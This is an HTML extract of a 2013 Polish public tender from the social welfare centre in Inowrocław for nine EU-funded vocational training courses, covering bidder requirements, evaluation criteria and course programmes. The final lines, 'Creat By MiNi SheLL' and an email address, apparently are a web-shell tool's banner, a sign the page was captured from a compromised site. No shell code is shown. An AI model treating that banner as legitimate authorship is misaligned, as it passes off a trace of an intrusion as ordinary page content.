<ul class="kh_indent_1"><li><p>- Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym 
         zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu - 
         Zał. nr. 2 
     - wykażą, że w okresie ostatnich trzech lat przed upływem terminu składania ofert,  a 
         jeżeli okres prowadzenia  działalności jest krótszy, w tym okresie, co najmniej  3 usługi      
         dla każdej części, polegające na organizacji i przeprowadzeniu szkoleń w zakresie 
         odpowiadającym rodzajem przedmiotowi zamówienia - z podaniem ich rodzaju, daty i 
         miejsca wykonania oraz załączeniem dokumentacji potwierdzającej, czy usługi zostały 
         wykonane lub zostały wykonane należycie - Zał. nr 3 
         Spełnienie warunków zostanie ocenione na podstawie złożonego oświadczenia, wg    
         formuły spełnia/nie spełnia, w oparciu o dołączone do oferty oświadczenie i dokumenty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym 
         zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu - 
         Zał. nr. 2
-  udokumentują, że dysponują odpowiednią salą szkoleniową wyposażoną w sprzęt      
         zapewniający zrealizowanie proponowanego programu oraz zapewnią warunki 
         niezbędne do przeprowadzenia zajęć praktycznych - Zał. nr 4
Spełnienie warunków zostanie ocenione na podstawie złożonego oświadczenia, wg    
         formuły spełnia/nie spełnia, w oparciu o dołączone do oferty oświadczenie i dokumenty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym 
         zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu - 
         Zał. nr. 2
     -  wykaz osób, które będą uczestniczyć w wykonaniu zamówienia, które posiadają stosowne 
          uprawnienia oraz doświadczenie zawodowe na stanowisku związanym z przedmiotem 
          szkolenia min.3 lata wraz z informacją o zakresie wykonywanych czynności - Zał. nr 5 
Spełnienie warunków zostanie ocenione na podstawie złożonego oświadczenia, wg    
         formuły spełnia/nie spełnia, w oparciu o dołączone do oferty oświadczenie i dokumenty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Wykonawca złoży oświadczenie o znajdowaniu się w sytuacji ekonomicznej i 
        finansowej, umożliwiającej realizację przedmiotu zamówienia, stanowiące - Zał. nr 2      
Spełnienie warunków zostanie ocenione na podstawie złożonego oświadczenia, wg    
         formuły spełnia/nie spełnia, w oparciu o dołączone do oferty oświadczenie i dokumenty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Dla każdej części zamówienia, Wykonawca przedstawi wykaz co najmniej trzech usług tyczących się każdej części zamówienia.;</li>

<li  style="margin-bottom: 12px;">opis urządzeń technicznych oraz środków organizacyjno-technicznych zastosowanych przez wykonawcę dostaw lub usług w celu zapewnienia jakości oraz opisu zaplecza naukowo-badawczego posiadanego przez wykonawcę lub które będzie pozostawało w dyspozycji wykonawcy;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy - załącznik Nr 1. 
2. Pełnomocnictwo dla osoby podpisującej ofertę do podejmowania zobowiązań w i         
    mieniu Wykonawcy składającego ofertę, gdy prawo do podpisania oferty nie wynika z 
    innych dokumentów do niej załączonych. 
3. Pisemne zobowiązanie innych podmiotów do oddania wykonawcy do dyspozycji  
   niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia - 
   jeżeli wykonawca polegać będzie na wiedzy i doświadczeniu, potencjale technicznym, 
   osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych 
   podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków.
4. Doświadczenie wykonawcy w organizowaniu kursów odpowiadające zakresowi 
    tematycznemu objętego niniejszym zamówieniem - załącznik nr 7.
5. Szczegółowy program tematyczny zajęć uwzględniający ramowe założenia kursu.
6. Oświadczenie o przynależności do grupy kapitałowej - załącznik nr 9</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Doświadczenie - 40</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.inowroclaw.ug.gov.pl  www.gopsinowroclaw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej w Inowrocławiu
ul. Królowej Jadwigi 43
88-100 Inowrocław
p. nr 29.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.09.2013 godzina 13:00, miejsce: Gminny Ośrodek Pomocy Społecznej w Inowrocławiu
ul. Królowej Jadwigi 43
88-100 Inowrocław
p. nr 29.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie finansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PRACOWNIK MAŁEJ GASTRONOMII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) KRÓTKI OPIS ZE WSKAZANIEM WIELKOŚCI LUB ZAKRESU ZAMÓWIENIA
.1 Ilość osób do przeszkolenia - 3 osoby w ramach projektu współfinansowanego z EFS,
      (Zamawiający przewiduje możliwość zmiany liczby uczestników kursu w przypadku 
      przerwania lub zakończenia udziału w projekcie) 
1.2 Miejsce szkolenia: Część teoretyczna i praktyczna szkolenia w Inowrocławiu.
1.3 Liczba godzin szkolenia (dla jednej osoby) - 140 godz. 
      1 godz. dydaktyczna = 60 minut
1.4 Termin wykonania kursu: Od września do listopada 2013r. Zajęcia powinny trwać od   
      poniedziałku do piątku po min 5  godz. dziennie, a nie więcej niż 8 godz. dziennie. 
1.5 Program szkolenia powinien obejmować co najmniej następujące zagadnienia: 
      - szkolenie BHP, minimum sanitarne;
      - wymogi systemu HACCP;
      - zasady prawidłowego żywienia;
      - wyposażenie techniczne zakładów gastronomicznych;
      - technologia gastronomiczna z towaroznawstwem;
      - podstawy sztuki kucharskiej;
      - systematyka składników mięsnych i jarskich;
      - typologia potraw;
      - procesy gotowania, smażenia, pieczenia, grillowania;
      - planowanie posiłków, sporządzanie menu;
      - metodologia przyrządzania potraw jarskich;
      - przepisy kulinarne kuchni staropolskiej i międzynarodowej;
      - sposoby serwowania dań;
      - obsługa klienta;
      - zajęcia praktyczne z wykorzystaniem poznanych metod i przepisów;
1.6 Wykonawca pokryje koszty związane z przeprowadzeniem niezbędnych badań do
      celów sanitarno - epidemiologicznych, które uprawniają uczestników do pracy w małej 
      gastronomi oraz  otrzymanie książeczki zdrowia dla celów sanitarno epidemiologicznych. 
1.7 Zapewnienie odzieży roboczej(fartuch, rękawiczki, czepek) i środków ochrony pracy    
      wymagane na danym stanowisku pracy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> KURS NA PRAWO JAZDY KAT. B.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2.1 Ilość osób do przeszkolenia - 18 osób w ramach projektu współfinansowanego z EFS,
      (Zamawiający przewiduje możliwość zmiany liczby uczestników kursu w przypadku 
      przerwania lub zakończenia udziału w projekcie). 
2.2 Miejsce szkolenia: Inowrocław.
2.3 Liczba godzin szkolenia (dla jednej osoby) - 60 godz. zgodnie z Rozporządzeniem   
      Ministra Infrastruktury z dnia 27 października 2005 roku w sprawie szkolenia, 
      egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i    
      egzaminatorów (Dz.U. Nr.217 poz. 1834 z póź. zm.).
      Ustawa  Prawo o ruchu drogowym z dnia 20 czerwca 1997r ( tj. Dz. U z 2005 r. Nr 108,   
      poz. 908  z późn. zm.).
2.4 Termin wykonania kursu: Od września do listopada 2013r.. Zajęcia teoretyczne powinny   
       trwać od poniedziałku do piątku po min 5  godz. dziennie, a nie więcej niż 8 godz.     
       dziennie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.41.12.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> FLORYSTYKA I ZDOBIENIE PRZEDMIOTÓW.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3.1 Ilość osób do przeszkolenia - 1 osoba w ramach projektu współfinansowanego z EFS,
      (Zamawiający przewiduje możliwość zmiany liczby uczestników kursu w przypadku przerwania    
      lub zakończenia udziału w projekcie). 
3.2 Miejsce szkolenia: Część teoretyczna i praktyczna szkolenia w Inowrocławiu.
3.3 Liczba godzin szkolenia (dla jednej osoby) - 120 godz. Kurs powinien być podzielony na   
      część teoretyczną i praktyczną.
      1 godz. dydaktyczna = 60 minut
3.4 Termin wykonania kursu: Od września do listopada 2013r. Zajęcia powinny trwać od   
      poniedziałku do piątku po min 5  godz. dziennie, a nie więcej niż 8 godz. dziennie. 
3.5 Program szkolenia powinien obejmować co najmniej następujące zagadnienia: 
      - Florystyka: ślubna, komunijna, pogrzebowa, okolicznościowa i inna;
      - zasady doboru kwiatów do różnorodnych kompozycji, techniki ich układania;
      - kompozycje z roślin suchych, sztucznych i żywych; 
      - pielęgnacja kwiatów, narzędzia i środki techniczne;
      - okolicznościowa dekoracja wnętrz;
      - zdobienie przedmiotów użytkowych.
3.6 Na zajęciach praktycznych należy uwzględnić pracę na kwiatach ciętych, żywych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pracownik hurtowni z obsługą wózka jezdniowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> .1 Ilość osób do przeszkolenia - 5 osoba w ramach projektu współfinansowanego z EFS,
      (Zamawiający przewiduje możliwość zmiany liczby uczestników kursu w przypadku przerwania    
      lub zakończenia udziału w projekcie) 
4.2 Miejsce szkolenia: Część teoretyczna i praktyczna szkolenia w Inowrocławiu.
4.3 Liczba godzin szkolenia (dla jednej osoby) - 120 godz. Kurs powinien być podzielony na   
      część teoretyczną i praktyczną.
      1 godz. dydaktyczna = 60 minut.
4.4 Termin wykonania kursu: Od września do listopada 2013r.. Zajęcia powinny trwać od   
      poniedziałku do piątku po min 5  godz. dziennie, a nie więcej niż 8 godz. dziennie. 
4.5 Program szkolenia powinien obejmować co najmniej następujące zagadnienia: 
     - typy stosowanych wózków,
     - budowa wózka,  
     -  czynności operatora przy obsłudze wózków przed podjęciem pracy, w czasie pracy i po  
        pracy, 
     - wiadomości z zakresu ładunkoznawstwa,
     - wiadomości o dozorze technicznym,
     - zasady budowy i działania oraz warunki techniczne obsługi butli i instalacji gazowych, 
     - zasady i warunki techniczne wykonywania wymiany butli z gazem w wózkach    
       widłowych
     - zasady i wymagania bezpieczeństwa pracy i ochrony przeciwpożarowej oraz 
       umiejętności udzielania pierwszej pomocy,
     - praktyczna nauka jazdy i manewrowania wózkiem widłowym,
     - uprawnienia eksploatacyjne na wymianę butli gazowych,
     - poznanie najważniejszych programów magazynujących, fakturujących,
     - technologie i zasady gospodarki magazynowej (w tym m.in. proces magazynowy,  
       procedury i dokumenty dostawy, manipulacje materiałami i pakowanie).
4.6 Wykonawca zapewni badania lekarskie dopuszczające do uczestnictwa w kursie oraz    
      zapewni opłatę za przeprowadzenie kursu.
4.7 Kurs winien być przeprowadzony w warunkach zgodnych z Rozporządzeniem Ministra
      Gospodarki z dnia 10 maja 2002 r. w sprawie bezpieczeństwa i higieny pracy przy
      użytkowaniu wózków jezdniowych z napędem silnikowym (Dz. U. Nr 70, poz. 650 z
      6 poźn. zm.) określa wymagania bezpieczeństwa i higieny pracy przy użytkowaniu   
      wózków jezdniowych z napędem silnikowym. 
4.8 Kurs kończy się egzaminem i uzyskaniem uprawnień na obsługę wózków widłowych i    
      samodzielną wymianę butli gazowej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> WIZAŻ I ZDOBIENIE PRZEDMIOTÓW.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość osób do przeszkolenia - 2 osoby w ramach projektu współfinansowanego z EFS,
      (Zamawiający przewiduje możliwość zmiany liczby uczestników kursu w przypadku przerwania    
      lub zakończenia udziału w projekcie). 
5.1 Miejsce szkolenia: Część teoretyczna i praktyczna szkolenia w Inowrocławiu.
5.2 Liczba godzin szkolenia (dla jednej osoby) - 120 godz. Kurs powinien być podzielony na     
       część teoretyczną i praktyczną.
      1 godz. dydaktyczna = 60 minut.
5.3 Termin wykonania kursu: Od września do listopada 2013r.. Zajęcia powinny trwać od   
      poniedziałku do piątku po min 5  godz. dziennie, a nie więcej niż 8 godz. dziennie. 
5.4 Program szkolenia powinien obejmować co najmniej następujące zagadnienia:
      - zapoznanie z zasadami BHP,
      - procesy starzenia się skóry,
    - dermatologia schorzeń,
    - manicure tradycyjny, biologiczny, pedicure kosmetyczny,
    - budowa paznokcia,
    - masaż dłoni i stóp,
    - zabiegi pielęgnacyjne, metody pielęgnacji skóry,
    - zdobienie paznokci, metody przedłużania paznokci,
    - depilacja ciała,
    - techniki makijażu,
    - elementy kosmetyki ciała,
    - podstawy wizażu, kreacja wizerunku w pracy zawodowej.
5.5 Wykonawca pokryje koszty związane z przeprowadzeniem niezbędnych badań do celów 
      sanitarno - epidemiologicznych dla beneficjentów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> OPERATOR  MASZYN DO PRAC ZIEMNYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość osób do przeszkolenia - 2 osoby w ramach projektu współfinansowanego z EFS,
      (Zamawiający przewiduje możliwość zmiany liczby uczestników kursu w przypadku przerwania    
      lub zakończenia udziału w projekcie). 
5.1 Miejsce szkolenia: Część teoretyczna i praktyczna szkolenia w Inowrocławiu.
5.2 Liczba godzin szkolenia (dla jednej osoby) - 212 godz. Kurs powinien być podzielony na    
      część teoretyczną i praktyczną.
      1 godz. dydaktyczna = 60 minut.
5.3 Termin wykonania kursu: Od września do listopada 2013r.. Zajęcia powinny trwać od   
      poniedziałku do piątku po min 5  godz. dziennie, a nie więcej niż 8 godz. dziennie.
5.4 Program szkolenia powinien obejmować co najmniej następujące zagadnienia:
      - dokumentacji technicznej maszyn roboczych, 
      - bezpieczeństwa i higieny pracy przy eksploatacji maszyn roboczych, 
      - technologii wykonywania robót ziemnych, 
      - użytkowania i obsługi maszyn roboczych,
      - naukę eksploatacji maszyn roboczych w różnych warunkach terenowych i     
        technologicznych,
     - elementy hydrauliki,
     - budowa koparko-ładowarek,
     - technologia robót.
5.5Szkolenie powinno kończyć się wydaniem zaświadczenia ukończenia kursu oraz zorganizowaniem egzaminu po zdaniu którego uczestnicy otrzymają książeczki z Instytutu Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie uprawniające do wykonywania zawodu Operatora maszyn do robót ziemnych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Nowoczesny sprzedawca z obsługą komputera i kasy fiskalnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość osób do przeszkolenia - 7 osób w ramach projektu współfinansowanego z EFS,
      (Zamawiający przewiduje możliwość zmiany liczby uczestników kursu w przypadku przerwania    
      lub zakończenia udziału w projekcie). 
7.1 Miejsce szkolenia: Inowrocław.
7.2 Liczba godzin szkolenia (dla jednej osoby) - 90 godz. 
      1 godz. dydaktyczna = 60 minut.
7.3 Termin wykonania kursu: Od września do listopada 2013r.. Zajęcia powinny trwać od   
      poniedziałku do piątku po min 5  godz. dziennie, a nie więcej niż 8 godz. dziennie.
7.4 Program szkolenia powinien obejmować co najmniej następujące zagadnienia:
      - nowoczesne techniki sprzedaży;
      - obsługa programów magazynowych, fakturujących;
      - pierwszy kontakt z klientem;
      - techniki negocjacyjne;
      - przyjmowanie reklamacji;
      - umiejętność słuchania i zadawania pytań;
      - analiza zachowań konsumentów na rynku;
      - obsługa kas fiskalnych; 
      - higiena pracy.
7.5 Każdy uczestnik musi mieć zapewniony dostęp do kasy fiskalnej(jeden uczestnik przy    
      stanowisku pracy).
7.6 Zajęcia muszą uwzględniać część praktyczną..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> OPIEKUN OSÓB STARSZYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość osób do przeszkolenia - 7 osób w ramach projektu współfinansowanego z EFS,
      (Zamawiający przewiduje możliwość zmiany liczby uczestników kursu w przypadku przerwania    
      lub zakończenia udziału w projekcie). 
8.1 Miejsce szkolenia: Część teoretyczna i praktyczna szkolenia w Inowrocławiu.
8.2 Liczba godzin szkolenia (dla jednej osoby) - 140 godz. 
      - część teoretyczna 70 godz.
     - część praktyczna (w DPS lub innych placówkach pomocowych dla osób starszych w    
       zakresie opiekuna osoby starszej) 70 godz. 
      1 godz. dydaktyczna = 60 minut.
8.3 Termin wykonania kursu: Od września do listopada 2013r.. Zajęcia powinny trwać od   
      poniedziałku do piątku po min 5 godz. dziennie, a nie więcej niż 8 godz. dziennie.
8.4 Program szkolenia powinien obejmować co najmniej następujące zagadnienia:
      - nabycie wiedzy teoretycznej i praktycznej z zakresu geriatrii,
      - udzielanie pierwszej pomocy,  
      - nabycie umiejętności pomocy osobom starszym w czynnościach dnia codziennego,
      - pielęgnowanie osób chorych, starszych i niepełnosprawnych,
      - posługiwanie się sprzętem i aparaturą medyczną,
      - prowadzenie dokumentacji,
      - profilaktyka odleżyn,
      - podstawy rehabilitacji i aktywizacji, 
      - podstawy komunikacji z podopiecznym i jego rodziną.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Spawacz w metodzie 111 lub 135.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość osób do przeszkolenia - 1 osoba w ramach projektu współfinansowanego z EFS,
      (Zamawiający przewiduje możliwość zmiany liczby uczestników kursu w przypadku przerwania    
      lub zakończenia udziału w projekcie). 
9.1 Miejsce szkolenia: Inowrocław.
9.2 Liczba godzin szkolenia (dla jednej osoby) - 120 godz. 
      1 godz. dydaktyczna = 60 minut.
9.3 Termin wykonania kursu: Od września do listopada 2013r.. Zajęcia powinny trwać od   
      poniedziałku do piątku po min 5  godz. dziennie, a nie więcej niż 8 godz. dziennie.
9.4 Program szkolenia powinien obejmować co najmniej następujące zagadnienia:
      - przepisy BHP;
      - urządzenia spawalnicze, budowa i ich użytkowanie;
      - charakterystyka pracy w hali produkcyjnej;
      - oznakowanie i wymiarowanie spoin; 
      - metody przygotowania złączy do spawania
      - metody spawania;  
9.5 Zajęcia muszą uwzględniać część praktyczną.
9.6 Program szkolenia musi uwzględniać wytyczne Instytutu Spawalnictwa w Gliwicach.
9.7 Szkolenie zakończy się końcowym egzaminem kwalifikacyjnym według Wytycznych 
      Instytutu Spawalnictwa w Gliwicach W-07/IS-17 oraz wydanie każdemu z kursantów 
      Świadectwa Egzaminu Kwalifikacyjnego Spawacza i książeczki spawacza.  
9.8 Szkolenie musi być poprzedzone badaniami lekarskimi kursantów przez lekarza 
      Medycyny Pracy.  
9.9 Koszty badań lekarskich ponosi Wykonawca..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie - 40</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com